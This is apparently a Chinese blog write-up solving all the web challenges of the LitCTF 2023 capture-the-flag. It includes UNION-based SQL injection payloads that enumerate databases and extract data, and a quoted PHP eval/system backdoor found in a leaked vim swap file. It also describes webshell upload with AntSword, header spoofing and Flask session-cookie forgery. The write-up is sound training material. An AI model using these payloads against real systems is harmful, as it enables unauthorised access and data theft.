LitCTF Web全解

WEB

[LitCTF]我Flag呢?

 这题直接 查看源码就好

[LitCTF]导弹迷踪

两种解法

第一种玩到第六关就可以直接出flag 不是很难

或者第二种 

先死一次 

去找js代码中的CRASHED

   var Messages = {
        START: {
            title: getLevelString,
            text:  function () {return 'CLICK TO BEGIN';}
        },
        CRASH: {
            title: function () {return 'CRASHED';},
            text:  function () {return 'CLICK TO RETRY';}
        },
        GAME_OVER: {
            title: function () {return 'GAME OVER';},
            text:  function () {return 'CLICK TO START AGAIN';}
        },
        FINISH: {
            title: function () {return 'LEVEL COMPLETED';},
            text:  function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},
        }
    };

 [LitCTF]Follow me and hack me

 

一个get和post传参

 

[LitCTF] PHP是世界上最好的语言!!

直接调用 这一题进去的时候我一直以为和json有关 忘记是php语言了 テ_デ

[LitCTF]Ping

 源码中有判断IPv4的格式

function check_ip(){
    let ip = document.getElementById('command').value;
    let re = /^(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)$/;

F12

<form action="" method="POST" onsubmit="return check_ip()">
          <input id="command" name="command" type="text" placeholder="Enter an IP address">

删除check

<form action="" method="POST" >
          <input id="command" name="command" type="text" placeholder="Enter an IP address">


  

 [LitCTF]Vim yyds

标题可知 vim泄露

扫一下

藏在./index.php.swp

   php
   $password = "Give_Me_Your_Flag";
   if ($_POST['password'] === base64_encode($password)) {
   	eval(system($_POST['cmd']));                 
   	echo "<p>Oh You got my password!</p>";
   }
   

 代码审计

 先将Give_Me_Your_Flag进行base64加密 在使用命令查询

[LitCTF]作业管理系统

 ctrl u 后得到用户名和密码 都是admin

文件上传

上传一句话木马 这里没有任何的过滤

蚁剑连接

[LitCTF] Http pro max plus

考点http协议伪造 

只允许本地访问   

Client-ip : 127.0.0.1

You are not from pornhub.com ! 

Referer : pornhub.con

用Chrome浏览器啊!

User-Agent : Chrome

不开代理你想上p站?

via : Clash.win

到这个页面

正经人从不看色图(手动狗头)

CTRL U

[LitCTF 2023]这是什么?SQL !注一下 !

尝试数字1 2 3

 除了3 其他都有回显 2 是彩蛋

3)))))) union select,1,2 #

 表

3)))))) union select 1,database()#

3)))))) union select 1 ,group_concat(table_name) from information_schema.tables where table_schema='ctf'#

 

3)))))) union select 1 ,group_concat(column_name) from information_schema.columns where table_name='users'#

没有flag 

进行跨库注入

3)))))) union select 1 ,group_concat(schema_name) from information_schema.schemata#

 

是在ctftraining

重复之前的步骤就行了

3)))))) union select 1 ,group_concat(flag) from ctftraining.flag#

[LitCTF 2023] 1zjs

进去玩了一圈发现没有啥用

查看源码

 在js源码中搜php

 进去后是这个

 丢到控制室跑一下

 [LitCTF 2023]就当无事发生

https://ProbiusOfficial.github.io

进去看看

浏览一圈没有发现

再去GitHub看看

 GitHub里搜索ProbiusOfficial

找到ProbiusOfficial.github.io

 进去就是flag

 [LitCTF 2023]彩蛋

 我flag呢 

位于js源码中

Follow me and hack me 

题目解答出后会提示“备份文件还有好吃的” 访问“/www.zip”下载备份文件 下载完成后打开“index.php” 得到

作业管理系统

访问页面中url My_pic/demo.jpg at main · ProbiusOfficial/My_pic · GitHub​​​​​​ ​​​​​​

就可以得到

狠狠的注入 

输入 2 就可以得到

[LitCTF 2023]Flag点击就送!

这里传什么 都会显示是 

传入burp

 看到了cookie的值是session

现学现搜

Flask之session伪造_HackerTenG的博客-CSDN博客

运用到了一个工具

GitHub - noraj/flask-session-cookie-manager: Flask Session Cookie Decoder/Encoder

密钥因为没给 所以直接尝试LitCTF

解密后 将name后值改成admin 在加密回去 传参就解决了

最后 get/flag

 

第一次web ak  有点激动

不足之处 欢迎大家留言补充

 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值